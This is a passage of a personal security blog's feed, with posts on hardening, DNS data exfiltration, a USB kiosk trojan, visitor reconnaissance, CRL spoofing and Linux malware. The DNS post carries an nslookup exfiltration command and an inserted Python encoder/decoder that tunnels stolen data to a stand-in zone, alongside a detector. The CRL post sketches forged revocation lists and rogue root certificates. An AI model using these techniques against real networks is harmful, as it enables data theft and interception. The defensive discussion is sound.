Of course, if you choose publisher (signature) rules instead, some of the more recent, possibly state-sponsored, malware that ships with valid signatures will still get you; hash rules over your whole clean system avoid that and leave you pretty damn safe.</div><div class="MsoNormal">If you are stuck on an older system with just SRP you can still hash your files; heck, use something like md5deep or sha1deep (sha256deep ships in the same package) to get all the hashes you need and script the creation of your rules, or just compare the hashes later as a poor man's Tripwire.</div><div class="MsoNormal">On Linux you have AppArmor and SELinux. I prefer SELinux's approach, but AppArmor is much easier to configure without breaking things. It is horses for courses, but whichever way you go, don't stay on the distro's rather relaxed default.&nbsp;</div><div class="MsoNormal">There are guides out there for SRP, AppLocker, SELinux and AppArmor, so I am not going to reproduce them; go google. Another one I didn't mention, as I have yet to have a decent play with it, is El Jefe (<a href="http://www.immunityinc.com/products-eljefe.shtml">http://www.immunityinc.com/products-eljefe.shtml</a>), which although being another agent does live process monitoring and trending, which is pretty cool.</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Network segregation</b>; really, that is it: segregate your servers based on what they do and limit communication between them with a firewall. Easy to do; get IPCop or Smoothwall if you have no cash. Think: does this device really need to talk to that device? If not, then why can it?&nbsp;</div><div class="MsoNormal"><br /></div><div class="MsoNormal">This is all simpler said than done. But there you have it, a quick dump of protections that I have used and would recommend. Some of these you can get in with no pain. This was just meant to be a few scripts I have written over the years, but it ended up a diatribe against add-ons and a spruik of built-in features... 
Ah well, I hope it is of use to someone.</div>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-26435592633418726422012-01-19T17:55:00.000+11:002012-01-19T17:55:00.180+11:00Easy data exfiltrationI had this thought last night as I was falling asleep. I realise it has probably been talked about already, but I will explain how easy it is to do and how hard it is for existing detections to catch.<br />The idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, logged on as a local user through some exploit, a boot disk or whatever. You probably don't have internet access, you can't install a tunnelling tool, and you don't want to set off the machine's HIDS by plugging in an unknown USB stick, so what do you do?<br />Well, you already have a DNS server running on a box you control, either pre-set-up for something like <a href='http://analogbit.com/tcp-over-dns_howto'>DNS tunnelling</a> or just legitimately resolving your own domains. Turn on verbose query logging for one of your subdomains; this is easy on BIND or even Windows DNS. Then from the internal machine encode the data any way you like and look it up: nslookup data.sub.mydomain.com. The internal recursive resolver forwards the query out to your authoritative server, which logs the name, and the data is out without a single direct connection. Bear in mind a full name is limited to 255 octets on the wire (253 characters as you type it) and each label to 63 characters, so anything bigger takes several lookups, with a sequence number in one of the labels so you can put the pieces back in order. If you need special characters, encode: base32 is the safe choice, because DNS is case-insensitive and resolvers may fold case, which mangles base64 (or use some system in your head).<br /><br />Mitigation: Do your client machines really need to resolve every site? Surely they are going through a proxy or application-aware firewall that can do the DNS lookups for them. 
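The whole scheme above, as an added example that is not part of the original post: the encoder that turns a blob into a run of lookups within the label and name limits, the receiver side that reassembles them from its query log, and, for the defender, a check over resolver query-log lines that picks the exfil zone out of ordinary traffic. The zone sub.example.com, the BIND-style log lines and the secret are all constructed for illustration, and the thresholds in suspicious_zones are assumptions to tune.

```python
"""DNS-lookup exfiltration end to end: encoder, receiver-side decoder, query-log detector.

Added example, not code from the original post. Zone name, log format and the
secret are constructed for illustration. Limits enforced: label <= 63 characters,
whole name <= 253 characters in text form (255 octets on the wire).
"""
from __future__ import annotations

import base64
import math
import re
from collections import Counter, defaultdict

ZONE = "sub.example.com"   # assumed attacker-controlled zone with verbose query logging
MAX_LABEL = 63             # RFC 1035 label limit
MAX_NAME = 253             # text-form name limit


def encode_chunks(data: bytes, zone: str = ZONE) -> list[str]:
    """Turn data into lookups of the form <seq>.<label>[.<label>...].<zone>.

    base32, because DNS is case-insensitive and resolvers may fold case, which
    would corrupt base64. Padding is stripped here and restored by the receiver.
    """
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    # name length = 3-digit seq + dot + L labels + (L-1) dots + dot + zone = 4 + 64L + len(zone)
    labels_per_name = (MAX_NAME - 4 - len(zone)) // (MAX_LABEL + 1)
    chars_per_name = labels_per_name * MAX_LABEL
    names = []
    for seq, start in enumerate(range(0, len(b32), chars_per_name)):
        chunk = b32[start:start + chars_per_name]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = f"{seq:03d}." + ".".join(labels) + "." + zone
        assert len(name) <= MAX_NAME and all(len(lab) <= MAX_LABEL for lab in labels)
        names.append(name)
    return names


def decode_names(names, zone: str = ZONE) -> bytes:
    """Receiver side: keep names under our zone, reorder by the sequence label,
    collapse duplicates (resolver retries), restore padding and decode."""
    suffix = "." + zone.lower()
    pieces: dict[int, str] = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        try:
            seq = int(labels[0])
        except ValueError:          # an ordinary lookup under the zone, not a data chunk
            continue
        pieces[seq] = "".join(labels[1:])
    b32 = "".join(pieces[i] for i in sorted(pieces)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


# ---- defender side: run over the resolver's query log --------------------------
LOG_RE = re.compile(r"query: (\S+) IN \w+")      # assumed BIND-style query log line


def shannon_entropy(s: str) -> float:
    """Bits per character: base32 payload sits near 5, real hostnames far lower."""
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())


def suspicious_zones(log_lines, min_names: int = 5, max_label: int = 40,
                     min_entropy: float = 3.0) -> list[str]:
    """Zones that receive many distinct names built from long, high-entropy labels."""
    names_by_zone: dict[str, set[str]] = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        name = m.group(1).rstrip(".").lower()
        names_by_zone[".".join(name.split(".")[-3:])].add(name)   # crude: group on last 3 labels
    flagged = []
    for zone, names in names_by_zone.items():
        if len(names) < min_names:
            continue
        long_labels = [lab for n in names for lab in n.split(".") if len(lab) > max_label]
        if long_labels and max(map(shannon_entropy, long_labels)) > min_entropy:
            flagged.append(zone)
    return sorted(flagged)


# ---- constructed sample data ----------------------------------------------------
SECRET = b"BEGIN KEY " + bytes(range(256)) * 2 + b" END"     # stand-in for a stolen file
EXFIL_NAMES = encode_chunks(SECRET)
SAMPLE_LOG = (
    [f"client 10.0.0.5#53412: query: {n} IN A + (10.0.0.1)" for n in EXFIL_NAMES + EXFIL_NAMES[:1]]
    + [f"client 10.0.0.7#40211: query: img{i}.cdn.example.org IN A + (10.0.0.1)" for i in range(6)]
    + ["client 10.0.0.7#40212: query: www.google.com IN A + (10.0.0.1)"]
)

if __name__ == "__main__":
    print(f"{len(SECRET)} bytes -> {len(EXFIL_NAMES)} lookups, longest {max(map(len, EXFIL_NAMES))} chars")
    print("round trip ok:", decode_names(EXFIL_NAMES + EXFIL_NAMES[:1]) == SECRET)
    print("flagged zones:", suspicious_zones(SAMPLE_LOG))
```

Run as is, the 526-byte sample becomes five lookups of at most 211 characters that decode back to the original even with a retried duplicate and a stray ordinary lookup under the zone mixed in, and the detector flags only sub.example.com, not the six short CDN names or the Google lookup. That long-label, high-entropy, many-distinct-names signature is what to key an alert on in the resolver's query log; the resolver is the one place every such lookup has to pass through.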
The issue with this is that most networks now use DNS to resolve internal services, the DNS servers that service those requests are usually allowed out to the internet in some way, and the proxies and firewalls refer back to those same internal DNS servers because they also point at resources the proxies need, like authentication. The only suggestion then is to split your DNS infrastructure more finely: the resolvers your clients use answer internal names only, a separate set of resolvers is allowed to talk both to those and to the wider internet, and the only device permitted to reach that second set is the proxy server. Short of re-architecting, log the queries your resolvers forward out and alert on long, high-entropy labels and on unusual numbers of distinct names under a single domain; normal clients do not produce either. Of course, depending on how your proxy works, it may not wait for the client to be authenticated before it does a lookup, so the lookups could simply be proxied through the compromised machine's web browser, which is already connected to the proxy.Morgannoreply@blogger.com2tag:blogger.com,1999:blog-7184718389860127472.post-77023887768162392782011-02-21T22:34:00.000+11:002011-02-21T22:34:27.342+11:00Adobe and FileOpen painNot really a 100% IT security post, but Fiona had an issue getting a particular site's print functionality to work on her Ubuntu laptop. It seemed to "print" by opening a PDF that was secured in some fashion. Looking at the error led nowhere, something like "could not open plugin"; looking at the source didn't help either, and there was no help page that Fiona could find on the site.<br />I resorted to trying to open the files with Windows; bam, it tried to install a plugin called FileOpen, and I found there was a Linux version of FileOpen <a href="http://plugin.fileopen.com/all.aspx">here</a>.<br />Excellent, a Linux version. I downloaded it and ran the installer shell script, which errored out as I had Adobe Reader 9.3, the latest, installed. Looking in the script, it checks the version of Adobe Reader installed, accepts only 7 or 8, and otherwise fails. 
Googling led me to a recipe site's support page with posts from back in 2008 complaining that Adobe Reader 9 wasn't supported; the recipe site had started to ditch FileOpen because that support request had never been fixed. The main reason I am posting this is to help others in this predicament.<br />It was important I get the site to work, so I assured Fiona that Windows was not the answer.<br />I ran the following (I had installed Reader manually from Adobe's deb, just in case it was an old-version issue): <i>sudo sh /opt/Adobe/Reader9/bin/UNINSTALL</i><br />Then I downloaded an older version from <a href="http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb">http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb</a> and installed it, then ran the FileOpen shell installer and all was good: the site worked, and all was happy with the world. Bear in mind that Reader 8.1.1 is years behind on security patches, so keep it for that one site rather than making it the default PDF handler.<br />Just posting this for anyone else who has the issue.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-57410978842293480512010-09-26T23:30:00.001+10:002010-09-26T23:38:32.214+10:00Definitely not outage VirginsSo in case you haven't heard, an international budget airline here in Australia has had a major computer issue, see <a href="http://www.smh.com.au/travel/travel-news/computer-glitch-causes-virgin-blue-delays-20100926-15s0k.html">here</a>.<br />By the sounds of it their outsourced service provider doesn't have redundant kit, as they couldn't simply fail over. 
But it gets worse: currently going to https://book.virginblue.com.au/FlightInfo.aspx or https://book.virginblue.com.au leaks a lot of information, including a nice juicy standard ASP.NET error page, exactly the kind of response the recently discussed ASP.NET padding oracle attack can make great use of, see <a href="http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310?utm_source=Threatpost&amp;utm_medium=Tabs&amp;utm_campaign=Today%27s+Most+Popular">here</a>.<br />Ouch and double ouch. Oh, and we hear this is not the first outage they have had in as many months...Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-65244435086708329702010-07-25T20:33:00.000+10:002010-07-25T20:33:02.019+10:00passive recon on valued targetsSo there was a bit of a flash in the pan recently, when my post on a simple autorun virus exploded after I notified Patrick Gray of the Risky Business podcast and he blogged it, and then ZDNet, Lifehacker and Slashdot (cue O Fortuna) picked it up. I am now even listening to the Risky Business episode where I get a mention.<br />Needless to say I got a lot of traffic (not a tonne; maybe the Slashdot effect is waning). The majority came from home users. Interestingly, a few had Firefox with JavaScript turned off; these showed up in Extreme Tracker (I have used them for a while, and they still have some value obviously), while those that didn't showed up in Google Analytics.<br />I am a big fan of NoScript, so it seems I am not alone.<br />Before I get on to my main point I feel I need to argue some points.<br />First, Lifehacker seemed to allude to the USB key being infected from my home system or in some other way. This is simply untrue. 
This is a Windows virus, thus a Windows binary, which simply won't run on Linux, so there is no way to get infected there, and that was the last system it was plugged into, with everything on it deleted to make way for the small collection of photos. The other point is the investigation I did: our receipt showed a time of 2:35pm (I have already given the job number to BigW for their investigation team), and the virus folder's creation time (and that of the files inside) was 2:24pm on the same day as the receipt.<br />On to the main point.<br />Of the total ~2000 hits, there were some interesting and funny ones. There were the obligatory hits from Woolworths, BigW's parent company, then, amusingly, from Coles (their biggest competitor) and Kodak (the kiosks are Fujifilm). Then came the interesting ones, obviously driven by the Slashdot post: hits from government organisations, and from big military complexes and security agencies the world over.<br />The point of this post is to point out what kind of information these different public and private organisations exposed. First off, something I thought of but my boss put eloquently into words: "Why do so many of these organisations have such telling reverse DNS records or IP block records?" Why indeed. I am not going to name names beyond the ones I already have: Woolworths' block was registered to Woolworths Limited.<br />The next point concerns me more: the other data that leaked out. I have their external IP, ok that's not really much, but also their browser version (a lot of IE6 out there; people, have you learned nothing from the Google breach?), their connection speed, OS, etc. 
This could lead to someone simply writing a decent tech article, getting Slashdotted, then watching a list of targets stream in; do a bit of Google digging, find an employee of said company's email address/LinkedIn/Facebook, and send them an email about a follow-up post carrying a nice 0-day with remote code execution to install your custom malware: good reconnaissance on the most valuable (techie) targets. Usually you can assume the techies are running the latest software in the company, so if you see IE6 you have hit pay dirt; if you see Mozilla 1.0, woo. You can even look for outdated OSes with unpatched vulnerabilities; there were a couple of Windows 98 and Windows 2000 hits. Oh, and to that OS/2 Warp 4 user that hit the site (if it wasn't forged), both my apologies and respect...<br />So from this I would think maybe everyone should change their proxies to use a different IP out of their block that is not registered to their company name, with no reverse DNS, and, you know, update your browser and OS once in a while, or change what your browser reports itself as to a different browser.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com1tag:blogger.com,1999:blog-7184718389860127472.post-92059607008978597442010-07-04T18:43:00.003+10:002010-07-06T13:22:24.292+10:00Big WirusGather round everyone for a tale of woe.<br />So I loaned one of my many USB keys to Fiona to back up some of our photos to print at a BigW, Mt Gravatt to be precise. I had cleared everything off and handed it over to her to copy over the photos. We tried it in a local BigW (Mt Ommaney) on Saturday but couldn't find a station that worked properly; we managed to get a few photos printed, but Fiona kept the key to see if she could get them printed elsewhere.<br />Off she trotted to Mt Gravatt BigW on Monday after she dropped the kids at kindy; she printed out the photos and thought nothing of it. 
Wednesday night I decided I should move my files back. I plugged the USB key in and noticed among the photos a hidden autorun.inf... not something I would normally leave there. A quick read of it in a text editor showed it was trying to run RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\driver.exe; scanning the file with ClamWin identified it as <a href="http://xml.ssdsandbox.net/index.php/78faaa98f49d3a2bb3c4030376b00673">Trojan.Poison-36</a> (it goes by other names; Trojan.KillAV is Symantec's), a nasty little phone-home trojan that was only discovered recently (9/06/10) and uses the usual trick of infecting attached drives via autorun.inf. It then goes on to try to kill AV programs and, once that is done, download other malware, see <a href="http://www.bitdefender.com/VIRUS-1000499-en--Trojan.KillAV.PT.html">here</a>.<br />I was safe due to my self-inflicted draconian software restriction policy, and Fiona, who had plugged it into her laptop, was safe because it is an exe and she runs Linux.<br />So I notified BigW back on the 30th; I think for something so small I have given them reasonable disclosure. It is something they could have designed against: a software restriction policy, simply making USB devices read-only via policy, or, hey, you know, antivirus that at least occasionally gets updated...<br />I was and still am tempted to put my own little exe and autorun on a key to see if the kiosks are still vulnerable, but Fiona has advised against it, my little voice of reason.<br />My problem with this issue is that there seems to have been little design put into a system that thousands of people probably use a week, and little concern for users of these systems: how many people are going to get home and infect their systems, and how many are going to not realise it was due to the dodgy kiosk they used and instead blame the internet, Microsoft, or their kids. 
I am not a big fan of misplaced blame.<br /><br />Not really much news here; viruses are a part of life. But with most modern USB keys no longer having the nice little feature of a read-only switch, there is little you can do to protect yourself. You could try having an autorun.inf on your key that is marked read-only; that may work unless the virus knows how to overwrite it.<br /><br />Morgan Storey<br /><br />security (posted 2010-04-27)<br />I am the first to admit I am a sad geek. When I saw this the other day it made me laugh, possibly a little too much: <a href="http://abstrusegoose.com/262">http://abstrusegoose.com/262</a><br />What follows is a computer security debate on a fictional character in a fictional universe; I apologise in advance.<br />Now I have to debate this. I always thought of R2D2 as the ultimate in automated hacking: an AI that is constantly writing vulnerabilities, heck, he probably has a virtual Imperial system running in his hardware to throw test code at. That and he had physical access to a data port, a la USB, so he may have known some nice little direct memory injections, or even a kind of side channel attack: if the system was one big computer (which it seems to be) he could have been detecting key inputs from other terminals via power fluctuations in the data port.
<br />If it was a network, he could have known some protocol vulnerability or remote code exec that the good old pompous "no one will be able to get to that vulnerable access port on our space station" Empire would not bother patching. Can you imagine the amount of patching the Empire would have to do, though?<br /><br />If we take the monolithic single-computer-per-vessel approach (which leaves no room for redundancy) you have at its peak 25,000 Star Destroyers, 12 Super Star Destroyers and around 3 million other vessels (TIE fighters, Corvettes, Gunships, Transports, and the Death Star). So let's say 3 million huge computers that probably can't be patched while in service, so will only be patched when in for maintenance at a dock, leaving lots of time for vulnerabilities to be discovered, and vulnerabilities on a non-segregated-duty single monolithic computer would be awesome: initiate self destruct, anyone?<br /><br />If we take the multi-computer networked approach (which seems more likely given what we know: that the hyperdrive computer needed time to spin up and that droids seem independent), a Star Destroyer had about 5,000 members in its crew, and the Super Star Destroyer and Death Star about 300,000 crew; we will say the smaller craft had an average of 10 crew (TIE fighters, Corvettes, Gunships, and Transports).
So that means a total number of servicemen and women of about 160 million. They probably work three 8-hour shifts a day plus some to cover weekends, so maybe a quarter of those have actual workstations, but there would be servers and central computers, so say 80 million computers, plus about 10 million network devices: near-on impossible to have 100% patch rollout on a network of that size. Give someone physical access to that network and they will get in somewhere, especially if that someone is a precocious little blue and white droid.<br /><br />Sources: <a href="http://starwars.wikia.com/">http://starwars.wikia.com</a><br /><br />Morgan Storey<br /><br />Atlassian and Apache are related? (posted 2010-04-15)<br />A very good write-up of the impressive attack that was carried out on these two groups: <a href="http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm">http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm</a><br />It is good that this underlines the real power of an XSS. I have heard people dismiss XSS, and this will be good to pull out at times like that. But it wasn't just XSS; it was a co-ordinated, multi-pronged attack. Work of real pros. Just goes to show if someone wants in badly enough they will get in.<br />I know some of the people at Atlassian and I would say that unfortunately they got attacked by a better opponent. No one is infallible. It is good, though, how Atlassian handled it and then how Apache handled the resultant attack.
I would say Atlassian was the target because of the donation to Apache; it made them a target.<br /><br />Oh yeah, and I have said it before and I will say it again: I hate URL shortening services, they should all die in a fire. If Twitter wants to stick to the 140 characters (which is a good thing), move to putting URLs in the page as a simple HTML link that goes at the bottom, the way Facebook does it.<br /><br />Morgan Storey<br /><br />A bleak but bright future (posted 2010-02-09)<br />So, listening to <a href="http://risky.biz/RB138">Dan Geer on the Risky Business podcast</a> talk about the possible future of computing today while flicking through my RSS feed, I came to a realisation.<br />The future of computing is going to be bleak. But maybe good for our security.<br />Dan was talking about the new iPad and existing single-purpose devices as being the new wave of computers. Think about it: a device that is so locked down and vendor-locked-in that it is inherently secure due to that. Devices that are single-purpose; they don't and can't do everything your previous computer could. Think about it: a light and switch doesn't require updates or security patches. Its purpose is singular, provide light or not.<br />These computers would do this as well: provide a game, information, or what have you. We are already here to some extent, single-purpose computers plugged into or inside televisions, locked down to the way the vendor wants, not necessarily locked down enough, but regardless.
They still have bugs, ways to circumvent the original intended operation, but generally speaking these bugs require the inclined to be in front of the device, not miles away in their parents' basement.<br />Then, while listening to this and pondering, I read another article about "cloud computing".<br />So the future will be these big provided clouds, some to play games in, some for businesses, others for research and development. Single-purpose environments abstracted away from even the technical users, who will use a single-purpose thin client to access these clouds.<br />So on one front it sounds good: security and technicalities are abstracted away to an extent. On another front it means tinkering will be harder, with everything; technical people will actually be less technical than they are now. It will be a dumbing down all around.<br />I have played with Amazon's Elastic Compute Cloud, Google App Engine, and run a personal virtual server on my laptop and media centre as well as running several different ones in production, so I can see the advantage for the moment, but they can pry my multi-purpose machines from my cold dead hands when the time comes.<br /><br />Morgan Storey<br /><br />Linux secure? (posted 2009-12-14, updated 2012-07-11)<br />Oh my, read this: http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html<br />Of course this is just the beginning. I saw this in the early days of Windows: popularity means people want flashy yet lame screensavers, so they go a-hunting, see a banner ad flashing epileptically at the user that tells them their search is over, they click it and install a new theme for their cursor (I hate these), a day-of-the-month screensaver, or a fancy toolbar which will let you know who is browsing your MyFaceTwitLinked page at any given time, and which also automatically installs
thousands of other applications you may like; hiding in these are some nice little bots. Of course on install it asks them for their password as it has to make system changes; it then puts a helper in root's cron and makes a new init.d daemon to keep it memory-resident and its privileges elevated, heck, maybe it even recompiles some binary that is used frequently with elevated privileges that checks all that other stuff is still good to go, something like the log server or init.<br />Then Linux will have reached the popularity of Windows, and the weakest link will again be the user.<br />So in my humorous little story above I am trying to point out that just because it is safe now won't mean it will be forever. Windows is less and less about worms that automatically get in without user intervention. Conficker was the last big one, and MS had a patch out before it hit, so it was only slow patching that really let it spread. The rest of the viruses that are seen are delivered along with innocuous-looking software, or at worst a drive-by download, which means a page is running something in the background that takes advantage of a hole in Internet Explorer to install something; these drive-by downloads won't happen. But have a look at the top 15 most common attacks, http://www.net-security.org/secworld.php?id=8597, and you will see Linux and Macs are susceptible to the lot, through misconfiguration or user error.<br />Don't get me wrong, I am a big Linux fan-boi. If I had it my way Windows would be the struggling niche, Linux would have 96% market share, BSD 2% and Macs wouldn't exist :P I think the ideal behind Linux is very admirable and scientific. Linux builds on what has come before it (usually), and because what has come before is open and readable this is fairly easy. "If I have seen further, it is by standing on the shoulders of giants." Sir Isaac Newton.
To not build on what has come before is to repeat your predecessors' mistakes.<br />There will always be flaws; till we write code that can write its own code, it may eventually create something almost flawless, or one of its children will.<br />I think Linux allows for greater security, but also greater insecurity. Security is not where open source's power lies; it is its flexibility.<br /><br />Morgan Storey<br /><br />Rickrolling has gone viral again (posted 2009-11-17)<br />Now this <a href="http://www.smh.com.au/technology/security/rickrolling-iphone-hacker-ashley-worm-or-boy-wonder-20091113-id2g.html">story</a> interests me on so many levels.<br />It has put Wollongong on the map again, people. I'll admit I was raised in the Gong, so it is good to see someone from Wollongong even making notoriety. The last renowned intelligent export we had was Evelyn Owen or Sir Lawrence Hargrave (1939 and 1915 respectively), so it has been some time between.<br />I also dislike Apple; their practices annoy me. Their practice of dumbing down everything, even the extremely technical, is the same as dropping superfluous words from the English language to make it easier for speakers; we only need one word for cold, right? They also stand on the shoulders of giants, yet give little recognition to those. Yes, they made Unix "usable" (so did Linux, without the pompousness), but try and find their references of gratitude to all their stolen code, or stolen ideas; nope. Apple have fallen down in the security world repeatedly, and this is a glaring example: who sets the same password on every device when you can assume with pretty high certainty that people are going to attack it and find out your password, hence the unlocking?<br />The other reason this is interesting is it is a virus that Rickrolls people, hilarious.
Rickrolling is something I have done, and had done to me, a fair few times; it almost always makes me smile. The other humorous point of this is the author is Ashley Towns, so the meme of Rick Astley is almost made for him.<br />Well, if you own an iPhone (hisss) then you can secure it against this virus <a href="http://www.redmondpie.com/how-to-secure-your-jailbroken-iphone-from-ssh-hack-9140084/">here</a> (a simple passwd to fix it); bear in mind that this virus will probably hang around for a few years like Code Red and Slammer. Funny stuff.<br /><br />Morgan Storey<br /><br />Revocation, just rolls off the tongue (posted 2009-09-02, updated 2009-09-03)<br />First an overview: SSL is pretty much the only protection available when banking, shopping etc. It means the user has to look for the https:// up the top rather than the http:// to ensure the session from their browser to the website's server is encrypted in transit (this isn't perfect; people can fake some certificates, and security researchers are trying to find its holes all the time). Don't trust the lock or the little green bar that EV certs give you, as these can be faked several ways; generally, though, the https and certificate information can be trusted. Also look at an extension for Firefox called SSL Blacklist that will notify you if a certificate is bad for one of many reasons.<br />One of the interesting things about certificates is of course they have to be able to be revoked, when for some reason they become compromised, or for some other reason.<br />CRLs, or certificate revocation lists, as some are probably aware, are basically a list stored on the website of the company that provided the certificates, a list of all the certs that have been revoked.
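Before looking at how that list gets fetched, here is how a client ought to consume one, as an added example in Go's standard library rather than code from the post: parse the CRL, verify its signature against a CA certificate that is already trusted locally, and only then look up a serial. A list re-signed with any other key fails the check no matter who served it or over what. The CA, its key and the serial numbers are throwaway fixtures generated in the code, not any real CA's.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"math/big"
	"time"
)

func check(err error) {
	if err != nil {
		panic(err)
	}
}

// makeCA builds a throwaway self-signed CA (constructed fixture, not any real CA's key).
func makeCA(name string) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	check(err)
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: name},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
		BasicConstraintsValid: true,
		IsCA:                  true,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	check(err)
	cert, err := x509.ParseCertificate(der)
	check(err)
	return cert, key
}

// makeCRL signs a CRL with the given CA key that revokes one serial number.
func makeCRL(issuer *x509.Certificate, key *ecdsa.PrivateKey, revokedSerial int64) []byte {
	tmpl := &x509.RevocationList{
		Number:              big.NewInt(1),
		ThisUpdate:          time.Now(),
		NextUpdate:          time.Now().Add(24 * time.Hour),
		RevokedCertificates: []pkix.RevokedCertificate{{SerialNumber: big.NewInt(revokedSerial), RevocationTime: time.Now()}},
	}
	der, err := x509.CreateRevocationList(rand.Reader, tmpl, issuer, key)
	check(err)
	return der
}

// IsRevoked reports whether serial is listed in crlDER, but only after the CRL's
// signature verifies against a CA certificate we already trust (pinned locally),
// never against a certificate fetched from the same unauthenticated HTTP site.
func IsRevoked(crlDER []byte, trustedCA *x509.Certificate, serial int64) (bool, error) {
	crl, err := x509.ParseRevocationList(crlDER)
	if err != nil {
		return false, err
	}
	if err := crl.CheckSignatureFrom(trustedCA); err != nil {
		return false, err // a CRL re-signed by someone in the middle ends up here
	}
	for _, rc := range crl.RevokedCertificates {
		if rc.SerialNumber.Int64() == serial {
			return true, nil
		}
	}
	return false, nil
}
```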
Excellent idea, but look at most certificates' details and the CRL is hosted on a good ole plain HTTP site, e.g. http://crl.thawte.com/ThawteSGCCA.crl<br />Yay. So if you want, just own a few CRLs via DNS poisoning, or man-in-the-middle (MITM) a user (can we say web cafe) and serve up a fake crafted CRL to revoke heaps of certificates, or just remove your revoked cert for their bank etc. Of course there are a lot of variables here: you need to know the CRL that is going to be requested, though if you have MITM'd them you can just serve all of them up; they are usually signed, but not always; you also need to know the sites they are going to go to, but you can do this dynamically as well.<br />Their digital signing doesn't look that good from what I have seen from reading the CRLs either, but they are supposed to sign it with their SSL certificate, available from their site via a link, so there is no trust there: just sign it with your own cert and serve that up at their site, as you are already in the middle.<br />But the nice thing as far as a denial goes is that most operating systems cache this info (for 24 hours usually), and the certificate hierarchy is good: just blacklist the vendor's root certificate.<br />To do any real damage you still need to get a certificate registered that has been falsely registered, or do a bit of social engineering: blacklist all certs and pop up a page saying the user needs to update their certificates, redirect them to a legit-looking site that asks them to install a certificate package full of your own generated root certificates, and all SSL sites from then on are readable as you re-sign them with your key on the way through.<br />Of course SSL isn't a fix for the revocation lists, as no one will see that it requests the list from https instead of http. I have even seen some installs of Internet Explorer that have certificate revocation checking turned off; I am not sure if this is default, but bad none the less.<br /><br />Well, I hope this long-winded, odd rant
has at least made some people think. It is a very odd setup and I am surprised all CRLs don't require possibly multiple signing by at least two vendors, kind of like nuclear launch codes.<br /><br />Morgan Storey<br /><br />VMware issues (posted 2009-06-24, updated 2009-06-25)<br />Not so much a dedicated security issue (though Availability is in the CIA triangle that should be drummed into everyone by now), but something I thought I would blog about as I found it nowhere else.<br />I was having an interesting issue with a guest on one of the ESX clusters I manage. Looking at the ESX host, none of its other guests were having issues. The guest in question came up as disconnected, not powered on. But I could RDP to it.<br />I logged into the host and checked esxtop and noticed the guest was in the list.<br />Checking the tasks of the guest in the VMware client I noticed its VCB backup last night died, and that the error I was getting on the guest was "Unable to communicate with host, since it is disconnected"; I got this same message when trying to power on the guest. I quickly checked the vmware.log and dmesg on the ESX host that was hosting the guest: nothing obvious, and googling around gave me no answers. It was then I noticed the last entry in the vmware.log was early this morning, to do with CD-ROM errors. I thought it could be a simple management disconnect, so I ran<br /><br />/etc/init.d/mgmt-vmware restart<br />The whole ESX server disconnected from the VMware client as you would expect, then it came back up; the problem host came back up too, no downtime, no mess.
Ran a quick manual backup and all done.<br /><br />Morgan Storey<br /><br />Ruxcon belated Day 2 (posted 2009-01-02, updated 2009-06-24)<br />So this is really a belated day 2; I've been fairly busy at work. We had an embargo for changes over December, but that didn't mean we didn't do work; we had fewer people on, so we did more.<br />I am going to put a bit more in than the initial recap I did of day 1; first, the recap of day 2.<br />Day 2 was well and truly on par with day 1. The Ruxcon guys put on an awesome con, and I had a great time.<br />To recap on day two: I went first to an excellent talk by Ben Mosse entitled Browser Rider, next on to a promising tool that was presented, I thought, somewhat apathetically, called Intelligent Webfuzzing by Neil and Bern Archibald. Then onto the BBQ lunch, where I had a chat with one of my security mentors, the venerable <a href="http://marty.sunriseroad.net/">Martin Visser</a> (he knows his Wireshark fu).<br />Then after lunch I went to one of the highlight talks of the con, Netscreen of the Dead by Graeme Neilson (that I recently heard talked about on the PaulDotCom Security Weekly podcast). Then onto the smaller room 2 for Googless by Christian Heinrich, a fairly good talk but I think aimed more at those not up on their Google fu and scripting.<br />Then finally onto a very interesting talk by Adam Daniel called Pimpin: Forensic Style.<br /><br />NOTE: the talk slides (not videos yet) are available <a href="http://www.ruxcon.org.au/2008-archive.shtml">here</a><br /><br />I was going to talk about the day in more depth, but that has been what has delayed this. I will post my notes one day.<br /><br />Morgan